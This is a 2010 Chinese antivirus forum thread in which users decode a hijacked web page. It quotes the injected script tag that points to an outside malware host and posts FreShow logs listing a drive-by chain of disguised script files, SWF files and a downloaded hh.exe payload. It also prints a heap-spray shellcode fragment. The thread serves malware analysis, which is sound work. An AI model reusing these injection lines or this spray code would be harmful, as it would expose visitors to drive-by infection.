请工程师分析 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 恶意网站交流请工程师分析

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十六次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

12

1 / 2 页

跳转页

[教程] 请工程师分析

virussec 禁止发言帖子:37 注册: 2009-07-29 来自:	发表于： 2010-02-17 16:03 \| 只看楼主短消息资料字号：小中大 1楼请工程师分析该用户帖子内容已被屏蔽
virussec 禁止发言帖子:37 注册: 2009-07-29 来自:	分享到：

qetuop 初生襁褓狮帖子:45 注册: 2008-10-08 来自:	发表于： 2010-02-17 16:22 \| 短消息资料字号：小中大 2楼回复：请工程师分析如果该网站异常，建议楼主举报恶意网站 http://tool.ikaka.com/report.asp
qetuop 初生襁褓狮帖子:45 注册: 2008-10-08 来自:

DragonKid 自信弱冠狮帖子:496 注册: 2009-12-31 来自:	发表于： 2010-02-17 16:28 \| 短消息资料字号：小中大 3楼回复：请工程师分析 <script language=javascript src=http://hlq.xorg.pl/c.js?google_ad=02x171_ad></script> 转义符清除(\x,\,%)(参数/无参数) 刚才没弄明白什么意思，不好意思~~ 下面是我的版本： Log is generated by FreShow. [wide]http://act.bij.pl/22/899sd.htm [frame]http://act.bij.pl/22/av.htm [frame]http://act.bij.pl/22/mp.htm [script]http://act.bij.pl/22/ll0.jpg [script]http://act.bij.pl/22/ll1.jpg [script]http://act.bij.pl/22/upp.jpg [object]http://act.bij.pl/l/hh.exe [script]http://act.bij.pl/22/llll1.jpg [script]http://act.bij.pl/22/llll.jpg [script]http://act.bij.pl/22/lllll.jpg [frame]http://act.bij.pl/22/nod.htm [frame]http://act.bij.pl/22/lz.htm [script]http://act.bij.pl/22/oopk.jpg [object]http://act.bij.pl/l/hh.exe [script]http://act.bij.pl/22/ll1.jpg [script]http://act.bij.pl/22/lz.jpg [frame]http://act.bij.pl/22/real.htm [frame]http://act.bij.pl/22/myra.htm [script]http://act.bij.pl/22/myr.jpg [object]http://act.bij.pl/l/hh.exe [frame]http://act.bij.pl/22/rising.htm [frame]http://act.bij.pl/22/ofnt.htm [script]http://act.bij.pl/22/oopk.jpg [object]http://act.bij.pl/l/hh.exe [script]http://act.bij.pl/22/uug.jpg [script]http://act.bij.pl/22/\"fa.js\" [script]http://act.bij.pl/22/\"1.js\" [script]http://js.tongji.linezing.com/806392/tongji.js DragonKid 最后编辑于 2010-02-17 17:30:14
DragonKid 自信弱冠狮帖子:496 注册: 2009-12-31 来自:

leo108 反毒学员帖子:648 注册: 2010-01-11 来自:	发表于： 2010-02-17 16:30 \| 短消息资料字号：小中大 4楼回复：请工程师分析 Log is generated by FreShow. [wide]http://act.bij.pl/22/899sd.htm [frame]http://act.bij.pl/22/av.htm [frame]http://act.bij.pl/22/mp.htm [frame]http://act.bij.pl/22/nod.htm [frame]http://act.bij.pl/22/real.htm [frame]http://act.bij.pl/22/myra.htm [script]http://act.bij.pl/22/myr.jpg [frame]http://act.bij.pl/22/rising.htm [frame]http://act.bij.pl/22/ofnt.htm [object]http://act.bij.pl/l/hh.exe [script]http://act.bij.pl/22/oopk.jpg [script]http://act.bij.pl/22/uug.jpg [script]http://act.bij.pl/22/\"fa.js\" [script]http://act.bij.pl/22/\"1.js\" 目前知道这里，继续 leo108 最后编辑于 2010-02-17 16:40:12
leo108 反毒学员帖子:648 注册: 2010-01-11 来自:

leo108 反毒学员帖子:648 注册: 2010-01-11 来自:	发表于： 2010-02-17 16:46 \| 短消息资料字号：小中大 5楼回复: 请工程师分析其他不用了都是 [object]http://act.bij.pl/l/hh.exe 这挂马的人真NB，什么加密方法都用上了，建议所有反毒学员都去看看
leo108 反毒学员帖子:648 注册: 2010-01-11 来自:

暗夜的雪飘泊而立狮帖子:638 注册: 2009-12-24 来自:娘胎	发表于： 2010-02-17 16:47 \| 短消息资料字号：小中大 6楼回复：请工程师分析 Log is generated by FreShow. [wide]http://act.bij.pl/22/av.htm [frame]http://act.bij.pl/22/mp.htm [script]http://act.bij.pl/22/ll0.jpg [script]http://act.bij.pl/22/ll1.jpg [script]http://act.bij.pl/22/upp.jpg [object]http://act.bij.pl/l/hh.exe [script]http://act.bij.pl/22/llll1.jpg [script]http://act.bij.pl/22/llll.jpg [script]http://act.bij.pl/22/lllll.jpg [frame]http://act.bij.pl/22/nod.htm [frame]http://act.bij.pl/22/lz.htm [script]http://act.bij.pl/22/oopk.jpg [object]http://act.bij.pl/l/hh.exe [script]http://act.bij.pl/22/ll1.jpg [script]http://act.bij.pl/22/lz.jpg [frame]http://act.bij.pl/22/real.htm [frame]http://act.bij.pl/22/myra.htm [object]http://act.bij.pl/l/hh.exe [frame]http://act.bij.pl/22/rising.htm [frame]http://act.bij.pl/22/ofnt.htm [script]http://act.bij.pl/22/oopk.jpg [object]http://act.bij.pl/l/hh.exe [script]http://act.bij.pl/22/uug.jpg 完整版~~累啊~ 大部分是shellcode带BD密钥的，有一个是利用real的漏洞。alpha2也能解决~ 但是http://act.bij.pl/22/myra.htm这个在Freshow里面获取代码不全，有了很大的迷惑性暗夜的雪最后编辑于 2010-02-17 16:53:38 娱乐致死还是娱乐至死啊？
暗夜的雪飘泊而立狮帖子:638 注册: 2009-12-24 来自:娘胎

辛达星郁锋芒艾服狮帖子:1507 注册: 2008-07-17 来自:	发表于： 2010-02-17 17:49 \| 短消息资料字号：小中大 7楼回复：请工程师分析 Log is generated by FreShow. [wide]http://act.bij.pl/22/av.htm [frame]http://act.bij.pl/22/mp.htm [script]http://act.bij.pl/22/ll0.jpg [script]http://act.bij.pl/22/ll1.jpg [script]http://act.bij.pl/22/upp.jpg [object]http://act.bij.pl/l/hh.exe [script]http://act.bij.pl/22/llll1.jpg [script]http://act.bij.pl/22/llll.jpg [script]http://act.bij.pl/22/lllll.jpg [frame]http://act.bij.pl/22/nod.htm [frame]http://act.bij.pl/22/lz.htm [script]http://act.bij.pl/22/oopk.jpg [object]http://act.bij.pl/l/hh.exe [script]http://act.bij.pl/22/ll1.jpg [script]http://act.bij.pl/22/lz.jpg [frame]http://act.bij.pl/22/real.htm [frame]http://act.bij.pl/22/myra.htm [script]http://act.bij.pl/22/myr.jpg [object]http://act.bij.pl/l/hh.exe [frame]http://act.bij.pl/22/rising.htm [frame]http://act.bij.pl/22/ofnt.htm [script]http://act.bij.pl/22/oopk.jpg [object]http://act.bij.pl/l/hh.exe [script]http://act.bij.pl/22/uug.jpg 要深入，要专一.......
辛达星郁锋芒艾服狮帖子:1507 注册: 2008-07-17 来自:

辛达星郁锋芒艾服狮帖子:1507 注册: 2008-07-17 来自:	发表于： 2010-02-17 17:52 \| 短消息资料字号：小中大 8楼回复：请工程师分析妈呀！！还有呢，还没有解完呢，那个只不过是一个链接要深入，要专一.......
辛达星郁锋芒艾服狮帖子:1507 注册: 2008-07-17 来自:

辛达星郁锋芒艾服狮帖子:1507 注册: 2008-07-17 来自:	发表于： 2010-02-17 17:59 \| 短消息资料字号：小中大 9楼回复：请工程师分析 Log is generated by FreShow. [wide]http://act.bij.pl/22/899sd.htm [frame]http://act.bij.pl/22/av.htm [script]http://act.bij.pl/22/\"fa.js\" [frame]http://act.bij.pl/22/fla.htm [frame]http://act.bij.pl/22/ + [object]http://act.bij.pl/l/hhh.exe [script]http://act.bij.pl/22/if.swf [frame]http://act.bij.pl/22/ + [script]http://act.bij.pl/22/if.swf [object]http://act.bij.pl/l/hhh.exe [frame]http://act.bij.pl/22/ + [object]http://act.bij.pl/l/hhh.exe [frame]http://act.bij.pl/22/ + [object]http://act.bij.pl/l/hhh.exe [frame]http://act.bij.pl/22/ + [object]http://act.bij.pl/l/hhh.exe [frame]http://act.bij.pl/22/ + [object]http://act.bij.pl/l/hhh.exe [script]http://act.bij.pl/22/\"1.js\" [script]http://js.tongji.linezing.com/806392/tongji.js 要深入，要专一.......
辛达星郁锋芒艾服狮帖子:1507 注册: 2008-07-17 来自:

辛达星郁锋芒艾服狮帖子:1507 注册: 2008-07-17 来自:	发表于： 2010-02-17 18:07 \| 短消息资料字号：小中大 10楼回复: 请工程师分析 http://act.bij.pl/22/if.swf这个好象是个flash加密我下载了，但是我不会解密，把后缀名给成txt代码看了看，不明白代码如下： function ifmy() { var dd = arr.toString().replace(/,/g,""); dd = dd.replace(/@/g,",") eval(dd); for(aniti=ina;aniti<0x600;aniti++) {memory[aniti]=nop + SC;}} 附件: 文件名:if.rar 下载次数:286 文件类型:application/octet-stream 文件大小: 上传时间:2010-2-17 18:06:35 描述:rar 要深入，要专一.......
辛达星郁锋芒艾服狮帖子:1507 注册: 2008-07-17 来自:

<<上一主题|下一主题>>

12

1 / 2 页

跳转页

页面顶部

Powered by Discuz!NT